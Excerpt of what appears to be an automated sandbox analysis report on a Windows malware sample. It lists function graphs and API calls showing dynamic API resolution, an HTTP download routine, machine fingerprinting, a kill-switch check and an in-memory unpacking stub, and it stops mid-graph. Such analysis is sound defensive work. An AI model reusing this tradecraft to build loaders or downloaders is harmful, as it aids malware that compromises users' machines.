                                  control_flow_graph 631 419c10-419c1a 632 419c20-41a031 GetProcAddress * 43 631->632 633 41a036-41a0ca LoadLibraryA * 8 631->633 632->633 634 41a146-41a14d 633->634 635 41a0cc-41a141 GetProcAddress * 5 633->635 636 41a153-41a211 GetProcAddress * 8 634->636 637 41a216-41a21d 634->637 635->634 636->637 638 41a298-41a29f 637->638 639 41a21f-41a293 GetProcAddress * 5 637->639 640 41a2a5-41a332 GetProcAddress * 6 638->640 641 41a337-41a33e 638->641 639->638 640->641 642 41a344-41a41a GetProcAddress * 9 641->642 643 41a41f-41a426 641->643 642->643 644 41a4a2-41a4a9 643->644 645 41a428-41a49d GetProcAddress * 5 643->645 646 41a4ab-41a4d7 GetProcAddress * 2 644->646 647 41a4dc-41a4e3 644->647 645->644 646->647 648 41a515-41a51c 647->648 649 41a4e5-41a510 GetProcAddress * 2 647->649 650 41a612-41a619 648->650 651 41a522-41a60d GetProcAddress * 10 648->651 649->648 652 41a61b-41a678 GetProcAddress * 4 650->652 653 41a67d-41a684 650->653 651->650 652->653 654 41a686-41a699 GetProcAddress 653->654 655 41a69e-41a6a5 653->655 654->655 656 41a6a7-41a703 GetProcAddress * 4 655->656 657 41a708-41a709 655->657 656->657
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,007463C0), ref: 00419C2D
                                  • GetProcAddress.KERNEL32(75900000,007465E0), ref: 00419C45
                                  • GetProcAddress.KERNEL32(75900000,00750370), ref: 00419C5E
                                  • GetProcAddress.KERNEL32(75900000,007505B0), ref: 00419C76
                                  • GetProcAddress.KERNEL32(75900000,00750598), ref: 00419C8E
                                  • GetProcAddress.KERNEL32(75900000,007504A8), ref: 00419CA7
                                  • GetProcAddress.KERNEL32(75900000,0074A558), ref: 00419CBF
                                  • GetProcAddress.KERNEL32(75900000,00750490), ref: 00419CD7
                                  • GetProcAddress.KERNEL32(75900000,00750388), ref: 00419CF0
                                  • GetProcAddress.KERNEL32(75900000,007504C0), ref: 00419D08
                                  • GetProcAddress.KERNEL32(75900000,00750550), ref: 00419D20
                                  • GetProcAddress.KERNEL32(75900000,00746600), ref: 00419D39
                                  • GetProcAddress.KERNEL32(75900000,00746620), ref: 00419D51
                                  • GetProcAddress.KERNEL32(75900000,00746640), ref: 00419D69
                                  • GetProcAddress.KERNEL32(75900000,007462A0), ref: 00419D82
                                  • GetProcAddress.KERNEL32(75900000,007505C8), ref: 00419D9A
                                  • GetProcAddress.KERNEL32(75900000,007504D8), ref: 00419DB2
                                  • GetProcAddress.KERNEL32(75900000,0074A300), ref: 00419DCB
                                  • GetProcAddress.KERNEL32(75900000,00746240), ref: 00419DE3
                                  • GetProcAddress.KERNEL32(75900000,007502E0), ref: 00419DFB
                                  • GetProcAddress.KERNEL32(75900000,007504F0), ref: 00419E14
                                  • GetProcAddress.KERNEL32(75900000,007502F8), ref: 00419E2C
                                  • GetProcAddress.KERNEL32(75900000,007503B8), ref: 00419E44
                                  • GetProcAddress.KERNEL32(75900000,00746220), ref: 00419E5D
                                  • GetProcAddress.KERNEL32(75900000,00750508), ref: 00419E75
                                  • GetProcAddress.KERNEL32(75900000,00750310), ref: 00419E8D
                                  • GetProcAddress.KERNEL32(75900000,00750568), ref: 00419EA6
                                  • GetProcAddress.KERNEL32(75900000,00750328), ref: 00419EBE
                                  • GetProcAddress.KERNEL32(75900000,007503A0), ref: 00419ED6
                                  • GetProcAddress.KERNEL32(75900000,00750340), ref: 00419EEF
                                  • GetProcAddress.KERNEL32(75900000,00750448), ref: 00419F07
                                  • GetProcAddress.KERNEL32(75900000,00750400), ref: 00419F1F
                                  • GetProcAddress.KERNEL32(75900000,00750358), ref: 00419F38
                                  • GetProcAddress.KERNEL32(75900000,00749818), ref: 00419F50
                                  • GetProcAddress.KERNEL32(75900000,00750538), ref: 00419F68
                                  • GetProcAddress.KERNEL32(75900000,007503D0), ref: 00419F81
                                  • GetProcAddress.KERNEL32(75900000,00746000), ref: 00419F99
                                  • GetProcAddress.KERNEL32(75900000,007503E8), ref: 00419FB1
                                  • GetProcAddress.KERNEL32(75900000,00746020), ref: 00419FCA
                                  • GetProcAddress.KERNEL32(75900000,00750418), ref: 00419FE2
                                  • GetProcAddress.KERNEL32(75900000,00750460), ref: 00419FFA
                                  • GetProcAddress.KERNEL32(75900000,00746040), ref: 0041A013
                                  • GetProcAddress.KERNEL32(75900000,00746260), ref: 0041A02B
                                  • LoadLibraryA.KERNEL32(00750688,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                  • LoadLibraryA.KERNEL32(007505E0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                  • LoadLibraryA.KERNEL32(007505F8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                  • LoadLibraryA.KERNEL32(00750610,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                  • LoadLibraryA.KERNEL32(007506A0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                  • LoadLibraryA.KERNEL32(00750628,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                  • LoadLibraryA.KERNEL32(00750640,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                  • LoadLibraryA.KERNEL32(00750658,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                  • GetProcAddress.KERNEL32(75FD0000,00746080), ref: 0041A0DA
                                  • GetProcAddress.KERNEL32(75FD0000,00750670), ref: 0041A0F2
                                  • GetProcAddress.KERNEL32(75FD0000,00750048), ref: 0041A10A
                                  • GetProcAddress.KERNEL32(75FD0000,00781108), ref: 0041A123
                                  • GetProcAddress.KERNEL32(75FD0000,007461C0), ref: 0041A13B
                                  • GetProcAddress.KERNEL32(73530000,0074A3A0), ref: 0041A160
                                  • GetProcAddress.KERNEL32(73530000,00745FE0), ref: 0041A179
                                  • GetProcAddress.KERNEL32(73530000,0074A580), ref: 0041A191
                                  • GetProcAddress.KERNEL32(73530000,007811C8), ref: 0041A1A9
                                  • GetProcAddress.KERNEL32(73530000,007810A8), ref: 0041A1C2
                                  • GetProcAddress.KERNEL32(73530000,00746060), ref: 0041A1DA
                                  • GetProcAddress.KERNEL32(73530000,007461E0), ref: 0041A1F2
                                  • GetProcAddress.KERNEL32(73530000,00781120), ref: 0041A20B
                                  • GetProcAddress.KERNEL32(763B0000,007460A0), ref: 0041A22C
                                  • GetProcAddress.KERNEL32(763B0000,00746280), ref: 0041A244
                                  • GetProcAddress.KERNEL32(763B0000,00781258), ref: 0041A25D
                                  • GetProcAddress.KERNEL32(763B0000,007811B0), ref: 0041A275
                                  • GetProcAddress.KERNEL32(763B0000,00745EA0), ref: 0041A28D
                                  • GetProcAddress.KERNEL32(750F0000,0074A5A8), ref: 0041A2B3
                                  • GetProcAddress.KERNEL32(750F0000,0074A5D0), ref: 0041A2CB
                                  • GetProcAddress.KERNEL32(750F0000,00781138), ref: 0041A2E3
                                  • GetProcAddress.KERNEL32(750F0000,00745EC0), ref: 0041A2FC
                                  • GetProcAddress.KERNEL32(750F0000,00746100), ref: 0041A314
                                  • GetProcAddress.KERNEL32(750F0000,0074A6E8), ref: 0041A32C
                                  • GetProcAddress.KERNEL32(75A50000,00781000), ref: 0041A352
                                  • GetProcAddress.KERNEL32(75A50000,00745F40), ref: 0041A36A
                                  • GetProcAddress.KERNEL32(75A50000,0074FFE8), ref: 0041A382
                                  • GetProcAddress.KERNEL32(75A50000,007810D8), ref: 0041A39B
                                  • GetProcAddress.KERNEL32(75A50000,00781288), ref: 0041A3B3
                                  • GetProcAddress.KERNEL32(75A50000,00746200), ref: 0041A3CB
                                  • GetProcAddress.KERNEL32(75A50000,007460C0), ref: 0041A3E4
                                  • GetProcAddress.KERNEL32(75A50000,00780FE8), ref: 0041A3FC
                                  • GetProcAddress.KERNEL32(75A50000,00781270), ref: 0041A414
                                  • GetProcAddress.KERNEL32(75070000,00745F20), ref: 0041A436
                                  • GetProcAddress.KERNEL32(75070000,00781030), ref: 0041A44E
                                  • GetProcAddress.KERNEL32(75070000,007812A0), ref: 0041A466
                                  • GetProcAddress.KERNEL32(75070000,007812B8), ref: 0041A47F
                                  • GetProcAddress.KERNEL32(75070000,00781150), ref: 0041A497
                                  • GetProcAddress.KERNEL32(74E50000,00745F60), ref: 0041A4B8
                                  • GetProcAddress.KERNEL32(74E50000,00746160), ref: 0041A4D1
                                  • GetProcAddress.KERNEL32(75320000,007460E0), ref: 0041A4F2
                                  • GetProcAddress.KERNEL32(75320000,00780FD0), ref: 0041A50A
                                  • GetProcAddress.KERNEL32(6F060000,00746120), ref: 0041A530
                                  • GetProcAddress.KERNEL32(6F060000,00745EE0), ref: 0041A548
                                  • GetProcAddress.KERNEL32(6F060000,00745F00), ref: 0041A560
                                  • GetProcAddress.KERNEL32(6F060000,00781168), ref: 0041A579
                                  • GetProcAddress.KERNEL32(6F060000,00746180), ref: 0041A591
                                  • GetProcAddress.KERNEL32(6F060000,007461A0), ref: 0041A5A9
                                  • GetProcAddress.KERNEL32(6F060000,00745F80), ref: 0041A5C2
                                  • GetProcAddress.KERNEL32(6F060000,00745FA0), ref: 0041A5DA
                                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0041A5F1
                                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0041A607
                                  • GetProcAddress.KERNEL32(74E00000,00781048), ref: 0041A629
                                  • GetProcAddress.KERNEL32(74E00000,00750008), ref: 0041A641
                                  • GetProcAddress.KERNEL32(74E00000,007810F0), ref: 0041A659
                                  • GetProcAddress.KERNEL32(74E00000,00781018), ref: 0041A672
                                  • GetProcAddress.KERNEL32(74DF0000,00745FC0), ref: 0041A693
                                  • GetProcAddress.KERNEL32(6F9C0000,00781060), ref: 0041A6B4
                                  • GetProcAddress.KERNEL32(6F9C0000,00746140), ref: 0041A6CD
                                  • GetProcAddress.KERNEL32(6F9C0000,00781180), ref: 0041A6E5
                                  • GetProcAddress.KERNEL32(6F9C0000,00781198), ref: 0041A6FD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: _t$ `t$ at$ bt$ ft$@_t$@`t$@at$@bt$@ft$HttpQueryInfoA$InternetSetOptionA$`_t$``t$`at$`bt$^t$_t$`t$at$et
                                  • API String ID: 2238633743-4170534340
                                  • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                  • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                  • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                  • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 999 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1006 406314-406318 999->1006 1007 40630d 999->1007 1008 406509-406525 call 41a7a0 call 41a800 * 2 1006->1008 1009 40631e-406342 InternetConnectA 1006->1009 1007->1006 1027 406528-40652d 1008->1027 1010 406348-40634c 1009->1010 1011 4064ff-406503 InternetCloseHandle 1009->1011 1013 40635a 1010->1013 1014 40634e-406358 1010->1014 1011->1008 1016 406364-406392 HttpOpenRequestA 1013->1016 1014->1016 1018 4064f5-4064f9 InternetCloseHandle 1016->1018 1019 406398-40639c 1016->1019 1018->1011 1021 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1019->1021 1022 40639e-4063bf InternetSetOptionA 1019->1022 1025 406407-406427 call 41a740 call 41a800 * 2 1021->1025 1026 40642c-40644b call 418940 1021->1026 1022->1021 1025->1027 1032 4064c9-4064e9 call 41a740 call 41a800 * 2 1026->1032 1033 40644d-406454 1026->1033 1032->1027 1036 406456-406480 InternetReadFile 1033->1036 1037 4064c7-4064ef InternetCloseHandle 1033->1037 1041 406482-406489 1036->1041 1042 40648b 1036->1042 1037->1018 1041->1042 1046 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1041->1046 1042->1037 1046->1036
                                  APIs
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                  • StrCmpCA.SHLWAPI(?,00750148), ref: 00406303
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                  • HttpOpenRequestA.WININET(00000000,GET,?,007821A8,00000000,00000000,00400100,00000000), ref: 00406385
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                  • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                  • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                  • InternetCloseHandle.WININET(00000000), ref: 00406503
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3074848878-2509457195
                                  • Opcode ID: 74f4209007b577ccc48e8c0826d09269495c13b7839733709352ef9982036ea0
                                  • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                  • Opcode Fuzzy Hash: 74f4209007b577ccc48e8c0826d09269495c13b7839733709352ef9982036ea0
                                  • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1056 4117a0-4117cd call 41aad0 StrCmpCA 1059 4117d7-4117f1 call 41aad0 strtok_s 1056->1059 1060 4117cf-4117d1 ExitProcess 1056->1060 1063 4117f4-4117f8 1059->1063 1064 4119c2-4119cd call 41a800 1063->1064 1065 4117fe-411811 1063->1065 1067 411817-41181a 1065->1067 1068 41199e-4119bd strtok_s 1065->1068 1069 411821-411830 call 41a820 1067->1069 1070 411849-411858 call 41a820 1067->1070 1071 4118ad-4118be StrCmpCA 1067->1071 1072 4118cf-4118e0 StrCmpCA 1067->1072 1073 41198f-411999 call 41a820 1067->1073 1074 4118f1-411902 StrCmpCA 1067->1074 1075 411951-411962 StrCmpCA 1067->1075 1076 411970-411981 StrCmpCA 1067->1076 1077 411913-411924 StrCmpCA 1067->1077 1078 411932-411943 StrCmpCA 1067->1078 1079 411835-411844 call 41a820 1067->1079 1080 41185d-41186e StrCmpCA 1067->1080 1081 41187f-411890 StrCmpCA 1067->1081 1068->1063 1069->1068 1070->1068 1095 4118c0-4118c3 1071->1095 1096 4118ca 1071->1096 1097 4118e2-4118e5 1072->1097 1098 4118ec 1072->1098 1073->1068 1099 411904-411907 1074->1099 1100 41190e 1074->1100 1083 411964-411967 1075->1083 1084 41196e 1075->1084 1086 411983-411986 1076->1086 1087 41198d 1076->1087 1101 411930 1077->1101 1102 411926-411929 1077->1102 1103 411945-411948 1078->1103 1104 41194f 1078->1104 1079->1068 1091 411870-411873 1080->1091 1092 41187a 1080->1092 1093 411892-41189c 1081->1093 1094 41189e-4118a1 1081->1094 1083->1084 1084->1068 1086->1087 1087->1068 1091->1092 1092->1068 1108 4118a8 1093->1108 1094->1108 1095->1096 1096->1068 1097->1098 1098->1068 1099->1100 1100->1068 1101->1068 1102->1101 1103->1104 1104->1068 1108->1068
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcessstrtok_s
                                  • String ID: block
                                  • API String ID: 3407564107-2199623458
                                  • Opcode ID: 31160efdca7bf48b69b5a6bd97d33fb6c5fabe7ffbf706427cbe04744fdb8866
                                  • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                  • Opcode Fuzzy Hash: 31160efdca7bf48b69b5a6bd97d33fb6c5fabe7ffbf706427cbe04744fdb8866
                                  • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1109 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1125 41557c-415583 1109->1125 1126 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1125->1126 1127 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1125->1127 1143 4155bb-4155d2 call 41a8a0 call 41a800 1126->1143 1153 415693-4156a9 call 41aad0 StrCmpCA 1127->1153 1156 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1127->1156 1143->1153 1159 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1153->1159 1160 4156af-4156b6 1153->1160 1156->1153 1291 415ac3-415ac6 1159->1291 1161 4157da-41585f call 41aad0 StrCmpCA 1160->1161 1162 4156bc-4156c3 1160->1162 1180 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1161->1180 1181 415865-41586c 1161->1181 1165 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1162->1165 1166 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1162->1166 1165->1161 1166->1161 1269 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1166->1269 1180->1291 1186 415872-415879 1181->1186 1187 41598f-415a14 call 41aad0 StrCmpCA 1181->1187 1193 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1186->1193 1194 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1186->1194 1216 415a16-415a21 Sleep 1187->1216 1217 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1187->1217 1193->1187 1295 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1193->1295 1194->1187 1216->1125 1217->1291 1269->1161 1295->1187
                                  APIs
                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,007478F8,?,0042110C,?,00000000), ref: 0041A82B
                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                    • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                    • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                  • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleepstrtok
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3630751533-2791005934
                                  • Opcode ID: 95f0fc00100f30bd4b73b87d77ac1ad8fe0b2bd46b58b2d7260737c8619ee5eb
                                  • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                  • Opcode Fuzzy Hash: 95f0fc00100f30bd4b73b87d77ac1ad8fe0b2bd46b58b2d7260737c8619ee5eb
                                  • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1320 417500-41754a GetWindowsDirectoryA 1321 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1320->1321 1322 41754c 1320->1322 1329 4175d8-4175df 1321->1329 1322->1321 1330 4175e1-4175fa call 418d00 1329->1330 1331 4175fc-417617 GetProcessHeap HeapAlloc 1329->1331 1330->1329 1332 417619-417626 call 41a740 1331->1332 1333 417628-417658 wsprintfA call 41a740 1331->1333 1341 41767e-41768e 1332->1341 1333->1341
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                  • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                  • wsprintfA.USER32 ref: 00417640
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\
                                  • API String ID: 3790021787-3809124531
                                  • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                  • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                  • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                  • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1342 22a003c-22a0047 1343 22a0049 1342->1343 1344 22a004c-22a0263 call 22a0a3f call 22a0e0f call 22a0d90 VirtualAlloc 1342->1344 1343->1344 1359 22a028b-22a0292 1344->1359 1360 22a0265-22a0289 call 22a0a69 1344->1360 1362 22a02a1-22a02b0 1359->1362 1364 22a02ce-22a03c2 VirtualProtect call 22a0cce call 22a0ce7 1360->1364 1362->1364 1365 22a02b2-22a02cc 1362->1365 1371 22a03d1-22a03e0 1364->1371 1365->1362 1372 22a0439-22a04b8 VirtualFree 1371->1372 1373 22a03e2-22a0437 call 22a0ce7 1371->1373 1375 22a04be-22a04cd 1372->1375 1376 22a05f4-22a05fe 1372->1376 1373->1371 1378 22a04d3-22a04dd 1375->1378 1379 22a077f-22a0789 1376->1379 1380 22a0604-22a060d 1376->1380 1378->1376 1382 22a04e3-22a0505 1378->1382 1383 22a078b-22a07a3 1379->1383 1384 22a07a6-22a07b0 1379->1384 1380->1379 1385 22a0613-22a0637 1380->1385 1394 22a0517-22a0520 1382->1394 1395 22a0507-22a0515 1382->1395 1383->1384 1386 22a086e-22a08be LoadLibraryA 1384->1386 1387 22a07b6-22a07cb 1384->1387 1388 22a063e-22a0648 1385->1388 1393 22a08c7-22a08f9 1386->1393 1391 22a07d2-22a07d5 1387->1391 1388->1379 1389 22a064e-22a065a 1388->1389 1389->1379 1392 22a0660-22a066a 1389->1392 1396 22a07d7-22a07e0 1391->1396 1397 22a0824-22a0833 1391->1397 1400 22a067a-22a0689 1392->1400 1402 